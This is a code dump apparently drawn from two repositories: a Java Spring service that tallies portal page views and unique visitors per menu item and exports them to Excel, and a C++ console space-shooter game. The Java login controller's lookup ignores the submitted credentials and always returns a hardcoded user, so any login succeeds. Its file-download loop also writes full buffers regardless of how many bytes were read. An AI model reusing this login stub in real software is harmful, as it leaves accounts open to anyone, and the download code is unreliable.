org.apache.poi.hssf.util.HSSFColor; import 
org.apache.poi.ss.usermodel.FillPatternType; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Service; import com.ebupt.entity.MrasPvAndUvBO; import com.ebupt.entity.SearchConditionsBO; import com.ebupt.entity.WebSysNavigatorBis; import com.ebupt.repository.MrasRepository; import com.ebupt.service.MrasService; @Service public class MrasServiceImpl implements MrasService { @Autowired private MrasRepository mrasRepository; @Override public String downloadMrasUvPv(SearchConditionsBO searchConditionsBO) throws Exception { //格式化nav List<WebSysNavigatorBis>navsList = formatAllNavigators(); //查询所有nav的pv/uv List<MrasPvAndUvBO>mrasPvAndUvList = getAllPVUV(searchConditionsBO); //设置pv/uv navsList = setAllNavigatorsPVUV(navsList,mrasPvAndUvList); //生成excel String excelPath = exportExcel(navsList,"output/",searchConditionsBO.getBeginTime(),searchConditionsBO.getEndTime()); return excelPath; } @Override public List<WebSysNavigatorBis> selectAllNavigators() { return mrasRepository.selectAllNavigators(); } @Override public List<WebSysNavigatorBis> formatAllNavigators() { // 查询所有菜单 List<WebSysNavigatorBis> allNavigatorsList = selectAllNavigators(); //整理一级菜单(首页每个模块的标题) List<WebSysNavigatorBis> navigatorsList = allNavigatorsList.stream().filter(navigator->"-1".equals(navigator.getParentId())).collect(Collectors.toList()); //整理二级菜单(每个模块的菜单项) navigatorsList.stream().forEach(firstNavigator->{ List<WebSysNavigatorBis> secondNavigatorsList = allNavigatorsList.stream().filter(navigator->firstNavigator.getId().equals(navigator.getParentId())).collect(Collectors.toList()); //整理三级菜单 secondNavigatorsList.stream().forEach( secondNavigator->{ List<WebSysNavigatorBis> thirdNavigatorsList = new ArrayList<WebSysNavigatorBis>(); allNavigatorsList.forEach(thirdNavigator->{ if(secondNavigator.getId().equals(thirdNavigator.getParentId())) { thirdNavigatorsList.add(thirdNavigator); } }); 
secondNavigator.setChildrenWebSysNavigatorBis(thirdNavigatorsList); } ); firstNavigator.setChildrenWebSysNavigatorBis(secondNavigatorsList); }); return navigatorsList; } /** * 设置nav的pv/uv * @param formatedNavsList * @param mrasPvAndUvList * @return */ public List<WebSysNavigatorBis> setAllNavigatorsPVUV(List<WebSysNavigatorBis> formatedNavsList,List<MrasPvAndUvBO>mrasPvAndUvList) { formatedNavsList.stream().forEach(navigator->{ //查询菜单的pv/uv navigator = setNavigatorsPVUV(navigator,mrasPvAndUvList); }); return formatedNavsList; } /** * 递归遍历nav * @param nav * @param mrasPvAndUvList * @return */ public WebSysNavigatorBis setNavigatorsPVUV(WebSysNavigatorBis nav,List<MrasPvAndUvBO>mrasPvAndUvList) { if(nav.getChildrenWebSysNavigatorBis()==null||nav.getChildrenWebSysNavigatorBis().size()==0) { //根据关键字查询pvuv List<MrasPvAndUvBO> filteredPvUvList = getPVUVByKey(nav.getName(),mrasPvAndUvList); if(!filteredPvUvList.isEmpty()) { nav.setPV(filteredPvUvList.get(0).getPV()); nav.setUV(filteredPvUvList.get(0).getUV()); }else { nav.setPV("0"); nav.setUV("0"); } }else { nav.setPV("0"); nav.setUV("0"); nav.getChildrenWebSysNavigatorBis().stream().forEach(childNavigator->{ setNavigatorsPVUV(childNavigator,mrasPvAndUvList); }); } return nav; } @Override public List<MrasPvAndUvBO> getPVUVByKey(String key,List<MrasPvAndUvBO>MrasPvAndUvList){ return MrasPvAndUvList.stream().filter(mrasPvAndUv->mrasPvAndUv.getOptDesc().contains(key)).collect(Collectors.toList()); } @Deprecated//重构改递归getAllNavigatorsPVUV public List<WebSysNavigatorBis> getAllNavigatorsPVUV1() { // List<WebSysNavigatorBis> formatAllNavigators = formatAllNavigators(); // formatAllNavigators.stream().forEach(firstNavigator->{ // //查询一级菜单的pv/uv // if(firstNavigator.getChildrenWebSysNavigatorBis()==null||firstNavigator.getChildrenWebSysNavigatorBis().size()==0) { // List<WebSysNavigatorBis>singleNavPVUV = getPVUVbyId(firstNavigator.getId()); // if(!singleNavPVUV.isEmpty()) { // firstNavigator.setPV(singleNavPVUV.get(0).getPV()); 
// firstNavigator.setUV(singleNavPVUV.get(0).getUV()); // } // }else { // //查询二级菜单的pv/uv // firstNavigator.getChildrenWebSysNavigatorBis().stream().forEach(secondNavigator->{ // if(secondNavigator.getChildrenWebSysNavigatorBis()==null||secondNavigator.getChildrenWebSysNavigatorBis().size()==0) { // List<WebSysNavigatorBis>singleNavPVUV = getPVUVbyId(secondNavigator.getId()); // if(!singleNavPVUV.isEmpty()) { // secondNavigator.setPV(singleNavPVUV.get(0).getPV()); // secondNavigator.setUV(singleNavPVUV.get(0).getUV()); // } // }else { // //查询三级菜单 // } // }); // } // }); return null; } @Override public List<MrasPvAndUvBO> getAllPVUV(SearchConditionsBO searchConditionsBO) { return mrasRepository.getAllPVUV(searchConditionsBO); } @Override public String exportExcel(List<WebSysNavigatorBis> navsList,String outPath,String beginTime,String endTime) throws Exception { //格式化时间 SimpleDateFormat parseFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); SimpleDateFormat outFormat = new SimpleDateFormat("yyyyMMdd"); String sheetBeginTime = outFormat.format( parseFormat.parse(beginTime)); String sheetEndTime = outFormat.format(parseFormat.parse(endTime)); //Workbook初始化工作 HSSFWorkbook wb = createHSSFWorkbook(); HSSFSheet sheet = wb.createSheet(String.format("门户访问统计%s-%s", sheetBeginTime,sheetEndTime)); //表头样式 HSSFCellStyle headStyle = setTableHeadStyle(wb); //一级目录样式 HSSFCellStyle firstStyle = setFirstDirStyle(wb); //二级目录样式 HSSFCellStyle secondStyle = setSecondDirStyle(wb); //内容字体样式 HSSFCellStyle contentStyle = setContentStyle(wb); // 表头开始--- //sheet.addMergedRegion(new CellRangeAddress(0, 0, 0, 1)); HSSFRow row0 = sheet.createRow(0); //设置列宽度 sheet.setColumnWidth(0, 256*30); sheet.setColumnWidth(1, 256*15); sheet.setColumnWidth(2, 256*15); //创建表头 HSSFCell cell0_0 = row0.createCell(0); HSSFCell cell0_1 = row0.createCell(1); HSSFCell cell0_2 = row0.createCell(2); // 设置表头样式 cell0_0.setCellStyle(headStyle); cell0_1.setCellStyle(headStyle); cell0_2.setCellStyle(headStyle); 
cell0_0.setCellValue("栏目"); cell0_1.setCellValue("访问人数"); cell0_2.setCellValue("访问次数"); //表头结束--- int rowNum = 1; for (WebSysNavigatorBis firstNav : navsList) { //一级nav HSSFRow firstNavRow = sheet.createRow(rowNum++); HSSFCell firstNavCell = firstNavRow.createCell(0); firstNavCell.setCellStyle(firstStyle); firstNavCell.setCellValue(firstNav.getName()); //二级nav for (WebSysNavigatorBis secondNav : firstNav.getChildrenWebSysNavigatorBis()) { HSSFRow secondNavRow = sheet.createRow(rowNum++); HSSFCell secondNavCell = secondNavRow.createCell(0); HSSFCell secondUVCell = secondNavRow.createCell(1); HSSFCell secondPVCell = secondNavRow.createCell(2); //设置二级nav样式 secondNavCell.setCellStyle(secondStyle); secondUVCell.setCellStyle(contentStyle); secondPVCell.setCellStyle(contentStyle); //设置二级nav内容 secondNavCell.setCellValue(secondNav.getName()); secondUVCell.setCellValue(Integer.parseInt(secondNav.getUV())); secondPVCell.setCellValue(Integer.parseInt(secondNav.getPV())); //三级nav for(WebSysNavigatorBis thirdNav :secondNav.getChildrenWebSysNavigatorBis()) { HSSFRow thirdNavRow = sheet.createRow(rowNum++); HSSFCell thirdNavCell = thirdNavRow.createCell(0); HSSFCell thirdUVCell = thirdNavRow.createCell(1); HSSFCell thirdPVCell = thirdNavRow.createCell(2); //设置三级nav样式 thirdNavCell.setCellStyle(contentStyle); thirdUVCell.setCellStyle(contentStyle); thirdPVCell.setCellStyle(contentStyle); //设置三级nav内容 thirdNavCell.setCellValue(thirdNav.getName()); thirdUVCell.setCellValue(Integer.parseInt(thirdNav.getUV())); thirdPVCell.setCellValue(Integer.parseInt(thirdNav.getPV())); } } } // 生成excel文件 SimpleDateFormat sdf = new SimpleDateFormat("yyyyMMddHHmmss"); Date date = new Date(); String formatDate = sdf.format(date); String excelPath = outPath+"门户访问统计-" + formatDate + ".xls"; FileOutputStream fileOut = new FileOutputStream(excelPath); wb.write(fileOut); fileOut.close(); wb.close(); return excelPath; } /** * 创建workbook初始化工作 * @return */ private HSSFWorkbook createHSSFWorkbook() { HSSFWorkbook 
wb = new HSSFWorkbook(); HSSFPalette palette = wb.getCustomPalette(); palette.setColorAtIndex(HSSFColor.BLUE.index, (byte)180, (byte)198, (byte)231); palette.setColorAtIndex(HSSFColor.DARK_BLUE.index, (byte)142, (byte)169, (byte)219); return wb; } /** * 表头样式 * @param wb * @return */ private HSSFCellStyle setTableHeadStyle(HSSFWorkbook wb) { // 改变字体样式 HSSFFont hssfFontTitile = wb.createFont(); // 设置字体,红色 //hssfFontTitile.setColor(HSSFFont.COLOR_RED); // 字体粗体显示 hssfFontTitile.setBold(true); hssfFontTitile.setFontName("等线"); // 字体大小 hssfFontTitile.setFontHeightInPoints((short) 13); // 设置样式 HSSFCellStyle tableHeadStyle = wb.createCellStyle(); tableHeadStyle.setFont(hssfFontTitile); // 设置居中 //tableHeadStyle.setAlignment(HorizontalAlignment.CENTER);// 水平居中 //tableHeadStyle.setVerticalAlignment(VerticalAlignment.CENTER);// 垂直居中 //设置单元格背景色 //cellStyle.setFillForegroundColor((short)555); //cellStyle.setFillPattern(FillPatternType.SOLID_FOREGROUND); return tableHeadStyle; } /** * 一级目录样式 * @param wb * @return */ private HSSFCellStyle setFirstDirStyle(HSSFWorkbook wb) { // 改变字体样式 HSSFFont hssfFontFirstDir = wb.createFont(); // 设置字体,红色 //hssfFontTitile.setColor(HSSFFont.COLOR_RED); // 字体粗体显示 hssfFontFirstDir.setBold(true); hssfFontFirstDir.setFontName("等线"); // 字体大小 hssfFontFirstDir.setFontHeightInPoints((short) 14); // 设置样式 HSSFCellStyle firstDirStyle = wb.createCellStyle(); firstDirStyle.setFont(hssfFontFirstDir); // 设置居中 //tableHeadStyle.setAlignment(HorizontalAlignment.CENTER);// 水平居中 //tableHeadStyle.setVerticalAlignment(VerticalAlignment.CENTER);// 垂直居中 //设置单元格背景色 firstDirStyle.setFillPattern(FillPatternType.SOLID_FOREGROUND); firstDirStyle.setFillForegroundColor(HSSFColor.BLUE.index); return firstDirStyle; } /** * 二级目录样式 * @param wb * @return */ private HSSFCellStyle setSecondDirStyle(HSSFWorkbook wb) { // 改变字体样式 HSSFFont hssfFontSecondDir = wb.createFont(); // 设置字体,红色 //hssfFontTitile.setColor(HSSFFont.COLOR_RED); // 字体粗体显示 hssfFontSecondDir.setBold(true); 
hssfFontSecondDir.setFontName("等线"); // 字体大小 hssfFontSecondDir.setFontHeightInPoints((short) 12); // 设置样式 HSSFCellStyle secondDirStyle = wb.createCellStyle(); //secondDirStyle.setBorderTop(BorderStyle.THIN); //secondDirStyle.setBorderBottom(BorderStyle.NONE); //secondDirStyle.setBorderLeft(BorderStyle.HAIR); //secondDirStyle.setBorderRight(BorderStyle.HAIR); secondDirStyle.setFont(hssfFontSecondDir); // 设置居中 //tableHeadStyle.setAlignment(HorizontalAlignment.CENTER);// 水平居中 //tableHeadStyle.setVerticalAlignment(VerticalAlignment.CENTER);// 垂直居中 //设置单元格背景色 //secondDirStyle.setFillPattern(FillPatternType.SOLID_FOREGROUND); //secondDirStyle.setFillForegroundColor(HSSFColor.BLUE.index); return secondDirStyle; } /** * 正文样式 * @param wb * @return */ private HSSFCellStyle setContentStyle(HSSFWorkbook wb) { // 改变字体样式 HSSFFont hssfFontContent = wb.createFont(); // 字体粗体显示 hssfFontContent.setFontName("等线"); // 字体大小 hssfFontContent.setFontHeightInPoints((short) 11); // 设置样式 HSSFCellStyle contentStyle = wb.createCellStyle(); contentStyle.setFont(hssfFontContent); return contentStyle; } } <file_sep>package com.ebupt.controller; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMethod; import lombok.extern.slf4j.Slf4j; @Slf4j @Controller public class IndexController { @RequestMapping(value= {"","/index","/index.html"}) public String index() { log.info("访问主页..."); return "index"; } @RequestMapping(value= {"mrrs"},method = {RequestMethod.GET}) public String mrrs() { return "mrrs"; } @RequestMapping(value = {"mras"},method = {RequestMethod.GET}) public String mras() { return "mras"; } @RequestMapping(value = {"login"},method = {RequestMethod.GET}) public String login() { return "login"; } } <file_sep>package com.ebupt.controller; import java.io.BufferedInputStream; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import 
java.io.OutputStream; import javax.servlet.http.HttpServletResponse; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; import org.thymeleaf.util.StringUtils; import com.ebupt.entity.SearchConditionsBO; import com.ebupt.service.MrasService; @RestController public class MrasController { @Autowired private MrasService mrasService; @RequestMapping("mras/download") private String getMrasPVUV(HttpServletResponse res, String beginTime,String endTime,String includeName,String excludeName) throws Exception { if (StringUtils.isEmpty(beginTime) || StringUtils.isEmpty(endTime)) { return "参数无效!"; } // 设置日志搜索的时间区域 SearchConditionsBO searchConditionsBO = new SearchConditionsBO(); searchConditionsBO.setBeginTime(beginTime); searchConditionsBO.setEndTime(endTime); // 设置查询的用户名 String[] includeNames = includeName != null && includeName.length() > 0 ? includeName.replaceAll(",", ",").trim().split(",") : null; String[] excludeNames = excludeName != null && excludeName.length() > 0 ? 
excludeName.replaceAll(",", ",").trim().split(",") : null; searchConditionsBO.setIncludeNames(includeNames); searchConditionsBO.setExcludeNames(excludeNames); // excel生成 String excelPath = mrasService.downloadMrasUvPv(searchConditionsBO); // excel下载 String fileName = new String("报门户访问统计.xls".getBytes("UTF-8"), "ISO8859-1"); res.setHeader("content-type", "application/octet-stream"); res.setContentType("application/octet-stream"); res.setHeader("Content-Disposition", "attachment;filename=" + fileName); byte[] buff = new byte[1024]; BufferedInputStream bis = null; OutputStream os = null; try { os = res.getOutputStream(); bis = new BufferedInputStream(new FileInputStream(new File(excelPath))); int i = bis.read(buff); while (i != -1) { os.write(buff, 0, buff.length); os.flush(); i = bis.read(buff); } } catch (IOException e) { e.printStackTrace(); } finally { if (bis != null) { try { bis.close(); } catch (IOException e) { e.printStackTrace(); } } } return ""; } } <file_sep>package com.ebupt.service; import com.ebupt.entity.SearchConditionsBO; public interface MrrsService { /** * * @param searchConditionsBO * @return excel的路径 * @throws Exception */ String getReportsUvPv(SearchConditionsBO searchConditionsBO) throws Exception; } <file_sep>package com.ebupt.controller; import java.util.HashMap; import java.util.Map; import javax.servlet.http.HttpServletRequest; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.ResponseBody; import com.ebupt.entity.User; @Controller public class LoginController { @RequestMapping("/toLogin") @ResponseBody public Map<String,Object> login(HttpServletRequest request, String username, String password) { Map<String,Object> jsonObject = new HashMap<String,Object>(); if (username != null && password != null) { User user = getUserByUserNameAndPassword(username, password);// if (user != null) { //request.getSession().setAttribute("userId", 
user.getId()); request.getSession().setAttribute("userName", user.getUsername()); jsonObject.put("status", "0"); jsonObject.put("msg", "登录成功!"); return jsonObject; } else { jsonObject.put("status", "1"); jsonObject.put("msg", "账号或密码不正确,请重新登录!"); return jsonObject; } } else { jsonObject.put("status", "1"); jsonObject.put("msg", "请填写正确信息!"); return jsonObject; } } private User getUserByUserNameAndPassword(String userName,String passWord){ return new User("zhangsan","<PASSWORD>"); } } <file_sep>package com.ebupt.repository; import java.util.ArrayList; import java.util.List; import com.ebupt.entity.SearchConditionsBO; import com.ebupt.entity.TReportDirectory; import com.ebupt.entity.TReportInfo; public interface MrrsRepository { /** * 查询报表目录 * * @return */ ArrayList<TReportDirectory> getTReportInfo(); /** * 查询所有报表 * * @return */ List<TReportInfo> getAllReports(); /** * 查询pvuv * @param searchConditionsBO * @return */ List<TReportInfo> getReportUVPV(SearchConditionsBO searchConditions); } <file_sep>package com.ebupt.entity; import lombok.Data; @Data public class MrasPvAndUvBO { /** * 操作描述 */ private String optDesc; private String UV; private String PV; /** * 登陆名 */ private String userName; /** * 真实名字 */ private String realName; } <file_sep>package com.ebupt.service; import java.util.List; import com.ebupt.entity.MrasPvAndUvBO; import com.ebupt.entity.SearchConditionsBO; import com.ebupt.entity.WebSysNavigatorBis; public interface MrasService { /** * 生成excel并返回其路径 * * @param searchConditionsBO * @return excel的路径 * @throws Exception */ String downloadMrasUvPv(SearchConditionsBO searchConditionsBO) throws Exception; /** * 查询所有菜单 */ List<WebSysNavigatorBis> selectAllNavigators(); /** * 格式化菜单一个三级 一级菜单二级菜单具体页面 */ List<WebSysNavigatorBis> formatAllNavigators(); /** * 根据关键字从集合中检索 * @param key * @param MrasPvAndUvList * @return */ List<MrasPvAndUvBO>getPVUVByKey(String key,List<MrasPvAndUvBO>MrasPvAndUvList); /** * 根据条件查询所有nav的pv/uv * @param searchConditionsBO * @return */ 
List<MrasPvAndUvBO> getAllPVUV(SearchConditionsBO searchConditionsBO); /** * list生成excel * @param navsList * @param outPath 输出目录 * @param startTime * @param endTime * @return * @throws Exception */ String exportExcel(List<WebSysNavigatorBis>navsList,String outPath,String startTime,String endTime) throws Exception; }
83ac5ff1dabac85c1e09f29b1b11409beaa78544
[ "Java" ]
11
Java
aQzing/bi-uvpv-statistics
e1d66c7c4a6741b2371f297346e5d8946e1c9b49
d67c652cdf603b827755f056622add59a75ae5a6
refs/heads/master
<repo_name>khoadpham/angularwork<file_sep>/myApp/scripts/script.js /** * Created by kpham on 8/18/16. */ var fruitsApp = angular.module('fruitsApp', []); fruitsApp.controller ('fruitsController', function ($scope, $http){ //$scope.fruits = []; $http.get('scripts/fruits.json').then(function(result){ $scope.fruits = result.data; }); });
29d8af4e7ded54deca0531f0f3c9ce16133f0064
[ "JavaScript" ]
1
JavaScript
khoadpham/angularwork
40f93df0b29ea73ee552178a53f502090afa9de7
0962c4c7bc555f3fd9b8f6145cd3f5a2ce65820f
refs/heads/master
<repo_name>seddiekim/SpaceGame<file_sep>/Space-Game/Space-Game/createWorld.cpp #include "createWorld.h" const int KEY_LEFT = 75; const int KEY_RIGHT = 77; GameWorld::GameWorld() : m_player(nullptr) { m_level = 0; m_points = 0; m_lives = 3; m_cols = 0; m_rows = 0; m_alive = true; m_levelComplete = false; m_exit = false; m_hit = false; } void GameWorld::levelBeginMessage(string level) { //Open the specified level. If the file for the level does not exist, it is assumed that the player has won. ifstream inFile; string fileName = "Levels\\Level" + level + ".txt"; inFile.open(fileName); //Level file cannot load so player has won if (inFile.fail()) { system("cls"); cout << "Congratulations on winning!!!" << endl << "You had " << m_points << " points." << endl; exit(1); } system("cls"); cout << "Prepare for Level " << level << "." << endl; cout << "Press 'SPACE' to continue or 'x' to exit." << endl; bool continueGame = false; while (!continueGame && !m_exit) { if (_kbhit()) { switch (_getch()) { case 32: continueGame = true; break; case 'X': case 'x': m_exit = true; break; default: break; } } } } void GameWorld::hitMessage() { system("cls"); if (m_lives > 0) { cout << "Ouch! You've been hit by the enemy." << endl; cout << "You have " << m_lives << " lives remaining." << endl; cout << "Press 'c' to continue, or 'x' to exit." << endl; bool continueGame = false; while (!continueGame && !m_exit) { if (_kbhit()) { switch (_getch()) { case 'C': case 'c': //recreates the boardgame continueGame = true; m_hit = false; m_alive = true; break; case 'x': case 'X': //exits the game m_exit = true; break; default: break; } } } } else { cout << "Ouch! You lost the game chief." << endl; cout << "The enemies have won and taken over your planet!!" << endl; cout << "Press 'x' to exit the program." 
<< endl; while (!m_exit) { if (_kbhit()) { switch (_getch()) { case 'x': case 'X': //exits the game m_exit = true; break; default: break; } } } } } void GameWorld::levelCompleteMessage(string level) //Display this message after completing a level { system("cls"); cout << "Congratulations, you beat Level " << level << "." << endl; cout << "You get another life because you beat the level!!!" << endl; cout << "Press 'c' to continue." << endl; //Delete the player and reset it delete m_player; m_player = nullptr; m_lives++; bool continueGame = false; while (!continueGame && !m_exit) { if (_kbhit()) { switch (_getch()) { case 'C': case 'c': continueGame = true; break; default: break; } } } } void GameWorld::createBoard(string level) //Creates the initial game board { //Open the specified level. If the file for the level does not exist, it is assumed that the player has won. ifstream inFile; string fileName = "Levels\\Level" + level + ".txt"; inFile.open(fileName); //Level file cannot load so player has won if (inFile.fail()) { cerr << "No such file exists"; exit(1); } m_level = stoi(level); string line; //Ensure that all variables of type vector are cleared, the player is set to alive status, and the level is not yet complete cleanUp(); m_alive = true; m_levelComplete = false; //Parse through the file and enter in the characters into a game board variable while (getline(inFile, line)) { vector<char> temp; for (int x = 0; x < line.length(); x++) { temp.push_back(line[x]); } m_board.push_back(temp); } //Retrieve the rows and cols for the specified game board m_rows = m_board.size(); m_cols = m_board[0].size(); //Parse through the game board and create the characters based on specified characters for (int row = 0; row < m_rows; row++) { for (int col = 0; col < m_cols; col++) { if (m_board[row][col] == 'x') { BasicEnemy* newEnemy = new BasicEnemy(row, col); m_Benemies.push_back(newEnemy); } else if (m_board[row][col] == 'v') { ShootingEnemy* newSEnemy = new 
ShootingEnemy(row, col); m_Senemies.push_back(newSEnemy); } else if (m_board[row][col] == '^') { m_player = new Player(row, col); } } } }; void GameWorld::updateBoard() //Redraws the game board with any modifications to the player and/or enemies { if (m_alive && !m_levelComplete) { //Clears screen system("cls"); //Clear the board as displayed in the vector for (int row = 0; row < m_rows; row++) { for (int col = 0; col < m_cols; col++) { if (m_board[row][col] != '#') { m_board[row][col] = ' '; } } } //Update Player position m_board[m_player->getRow()][m_player->getCol()] = '^'; //Update Bullet position before enemy position so that the enemy positions overlay the bullet for (int x = 0; x < m_Bullets.size(); x++) { m_board[m_Bullets[x]->getRow()][m_Bullets[x]->getCol()] = '|'; } //Update Enemy positions for (int x = 0; x < m_Benemies.size(); x++) { m_board[m_Benemies[x]->getRow()][m_Benemies[x]->getCol()] = 'x'; } for (int x = 0; x < m_Senemies.size(); x++) { m_board[m_Senemies[x]->getRow()][m_Senemies[x]->getCol()] = 'v'; } //Print header string header = "Level: " + to_string(m_level) + " Lives: " + to_string(m_lives) + " Points: " + to_string(m_points); cout << header << endl; //Updates the game board based on the player movement and the patterned enemy movement for (int row = 0; row < m_rows; row++) { for (int col = 0; col < m_cols; col++) { cout << m_board[row][col]; } cout << endl; } } } void GameWorld::movePlayer() //Moves the player based on user input { //If a keyboard input is registered, perform a particular action if (_kbhit()) { Bullet* playerBullet = new Bullet(m_player->getRow() - 1, m_player->getCol(), true); switch (_getch()) { case KEY_LEFT: case 'A': case 'a': //Move the player left if (m_player->getCol() > 1) { m_player->moveLeft(); } break; case KEY_RIGHT: case 'D': case 'd': //Move the player right if (m_player->getCol() < m_cols - 2) { m_player->moveRight(); } break; case 32: //Shoot a bullet m_Bullets.push_back(playerBullet); break; case 'X': 
case 'x': //Exit the game m_exit = true; break; default: //Prevent memory leak delete playerBullet; break; } } } void GameWorld::moveEnemy(enemDir& enemyDirection) //Moves the enemy units as a group { //Determine the minimum and maximum position of the enemies as observing them as a group to determine their possible movement trajectory int maxCol = -1; int minCol = m_cols; for (int x = 0; x < m_Benemies.size(); x++) { maxCol = max(maxCol, m_Benemies[x]->getCol()); minCol = min(minCol, m_Benemies[x]->getCol()); } for (int x = 0; x < m_Senemies.size(); x++) { maxCol = max(maxCol, m_Senemies[x]->getCol()); minCol = min(minCol, m_Senemies[x]->getCol()); } //Move the enemy units to the right if allowed to do so as defined by the game borders if (enemyDirection == RIGHT) { if (maxCol < m_cols - 2) { moveEnemiesRight(); } else { moveEnemiesLeft(); enemyDirection = LEFT; } } //Move the enemy units to the left if allowed to do so as defined by the game borders else { if (minCol > 1) { moveEnemiesLeft(); } else { moveEnemiesRight(); enemyDirection = RIGHT; } } } void GameWorld::moveEnemiesLeft() //Move each enemy a column to the left { for (int x = 0; x < m_Benemies.size(); x++) { m_Benemies[x]->setCol(m_Benemies[x]->getCol() - 1); } for (int x = 0; x < m_Senemies.size(); x++) { m_Senemies[x]->setCol(m_Senemies[x]->getCol() - 1); } } void GameWorld::moveEnemiesRight() //Move each enemy a column to the right { for (int x = 0; x < m_Benemies.size(); x++) { m_Benemies[x]->setCol(m_Benemies[x]->getCol() + 1); } for (int x = 0; x < m_Senemies.size(); x++) { m_Senemies[x]->setCol(m_Senemies[x]->getCol() + 1); } } void GameWorld::enemyShoot() { //Generate a distribution of random numbers random_device rd; mt19937 gen(rd()); uniform_int_distribution<> dis(1, 100); //Give each Shooting Enemy a 1% chance to shoot at each iteration for (int x = 0; x < m_Senemies.size(); x++) { if (dis(gen) == 1) { Bullet* enemyBullet = new Bullet(m_Senemies[x]->getRow() + 1, m_Senemies[x]->getCol(), 
false); m_Bullets.push_back(enemyBullet); } } } void GameWorld::moveBullet() //Moves the bullet in the proper direction { //If the bullet is from the player, it should move up. Otherwise, it should move down int x = 0; while (x < m_Bullets.size() && m_alive) { bool collision = false; //Move bullet up if player bullet if (m_Bullets[x]->isPlayerBullet()) { m_Bullets[x]->moveBullet(m_Bullets[x]->getRow() - 1); //Delete bullet from the vector if it goes out of bounds if (m_Bullets[x]->getRow() == 0) { delete m_Bullets[x]; m_Bullets.erase(m_Bullets.begin() + x); } else { //Determine if a bullet collides with an enemy if (!collision) { for (int y = 0; y < m_Benemies.size(); y++) { collision = checkCollision(m_Bullets[x], m_Benemies[y]->getRow(), m_Benemies[y]->getCol()); //If there is a collision, update the point count and delete the particular enemy and bullet from the vectors if (collision) { m_points += 100; delete m_Benemies[y]; m_Benemies.erase(m_Benemies.begin() + y); delete m_Bullets[x]; m_Bullets.erase(m_Bullets.begin() + x); break; } } } if (!collision) { for (int y = 0; y < m_Senemies.size(); y++) { collision = checkCollision(m_Bullets[x], m_Senemies[y]->getRow(), m_Senemies[y]->getCol()); if (collision) { m_points += 250; delete m_Senemies[y]; m_Senemies.erase(m_Senemies.begin() + y); delete m_Bullets[x]; m_Bullets.erase(m_Bullets.begin() + x); break; } } } } } //Move bullet down if an enemy bullet else { m_Bullets[x]->moveBullet(m_Bullets[x]->getRow() + 1); //Delete bullet from the vector if it goes out of bounds if (m_Bullets[x]->getRow() == m_rows - 1) { collision = true; delete m_Bullets[x]; m_Bullets.erase(m_Bullets.begin() + x); } //Determine if bullet collides with the player else { collision = checkCollision(m_Bullets[x], m_player->getRow(), m_player->getCol()); if (collision) { //Set player to dead and clean up the player m_alive = false; delete m_player; m_player = nullptr; m_hit = true; cleanUp(); m_lives--; } } } if (!collision) { x++; } } } bool 
GameWorld::checkCollision(Bullet* bullet, int objectRow, int objectCol) //Check for a collision if the rows and cols of two objects are the same { if (bullet->getCol() == objectCol && bullet->getRow() == objectRow) { return true; } return false; } bool GameWorld::isHit() { return m_hit; } bool GameWorld::isExit() //Return the exit status { return m_exit; } int GameWorld::getLives() //Return the number of lives left { return m_lives; } bool GameWorld::isAlive() //Return if the player is alive { return m_alive; } void GameWorld::checkIfComplete() //Determine if the level is complete if there are no more enemies left and the player is still alive { if (m_Benemies.size() == 0 && m_Senemies.size() == 0 && m_alive) { m_levelComplete = true; } } bool GameWorld::isLevelComplete() //Return if the level is complete { return m_levelComplete; } void GameWorld::cleanUp() //Clean up the game board from death { //Properly delete the enemies and bullets and clear their associated vectors for (int x = 0; x < m_Benemies.size(); x++) { delete m_Benemies[x]; } for (int x = 0; x < m_Senemies.size(); x++) { delete m_Senemies[x]; } for (int x = 0; x < m_Bullets.size(); x++) { delete m_Bullets[x]; } m_board.clear(); m_Benemies.clear(); m_Senemies.clear(); m_Bullets.clear(); } <file_sep>/Space-Game/Space-Game/characters.h #ifndef CHARACTERS_H_ #define CHARACTERS_H_ class Bullet { public: Bullet(int row, int col, bool playerBullet); int getRow(); int getCol(); bool isPlayerBullet(); void moveBullet(int row); private: int m_row; int m_col; bool m_playerBullet; }; class Player { public: Player(int row, int col); int getRow(); int getCol(); void moveRight(); void moveLeft(); private: int m_row; int m_col; }; class BasicEnemy { public: BasicEnemy(int row, int col); int getRow(); int getCol(); void setCol(int col); private: int m_row; int m_col; }; class ShootingEnemy { public: ShootingEnemy(int row, int col); int getRow(); int getCol(); void setCol(int col); private: int m_row; int m_col; }; 
#endif <file_sep>/Space-Game/Space-Game/createWorld.h #ifndef GAMEWORLD_H_ #define GAMEWORLD_H_ #include "characters.h" #include <iostream> #include <conio.h> #include <fstream> #include <sstream> #include <cstdlib> #include <random> #include <vector> #include <string> #include <algorithm> using namespace std; enum enemDir { LEFT, RIGHT }; class GameWorld { public: GameWorld(); void levelBeginMessage(string level); void hitMessage(); void levelCompleteMessage(string level); void createBoard(string fileName); void updateBoard(); void movePlayer(); void moveEnemy(enemDir& enemyDirection); void moveEnemiesLeft(); void moveEnemiesRight(); void enemyShoot(); void moveBullet(); bool checkCollision(Bullet* bullet, int objectRow, int objectCol); bool isHit(); bool isExit(); int getLives(); bool isAlive(); void checkIfComplete(); bool isLevelComplete(); void cleanUp(); private: int m_points; int m_lives; int m_cols; int m_rows; int m_level; bool m_alive; bool m_hit; // checks to see if the player has been hit bool m_levelComplete; bool m_exit; vector<vector<char>> m_board; Player* m_player; vector<BasicEnemy*> m_Benemies; vector<ShootingEnemy*> m_Senemies; vector<Bullet*> m_Bullets; }; #endif<file_sep>/Space-Game/Space-Game/characters.cpp #include "characters.h" Bullet::Bullet(int row, int col, bool playerBullet) { m_row = row; m_col = col; m_playerBullet = playerBullet; } int Bullet::getRow() { return m_row; } int Bullet::getCol() { return m_col; } bool Bullet::isPlayerBullet() { return m_playerBullet; } void Bullet::moveBullet(int row) { m_row = row; } Player::Player(int row, int col) { m_row = row; m_col = col; } int Player::getRow() { return m_row; } int Player::getCol() { return m_col; } void Player::moveLeft() { m_col--; } void Player::moveRight() { m_col++; } BasicEnemy::BasicEnemy(int row, int col) { m_row = row; m_col = col; } int BasicEnemy::getRow() { return m_row; } int BasicEnemy::getCol() { return m_col; } void 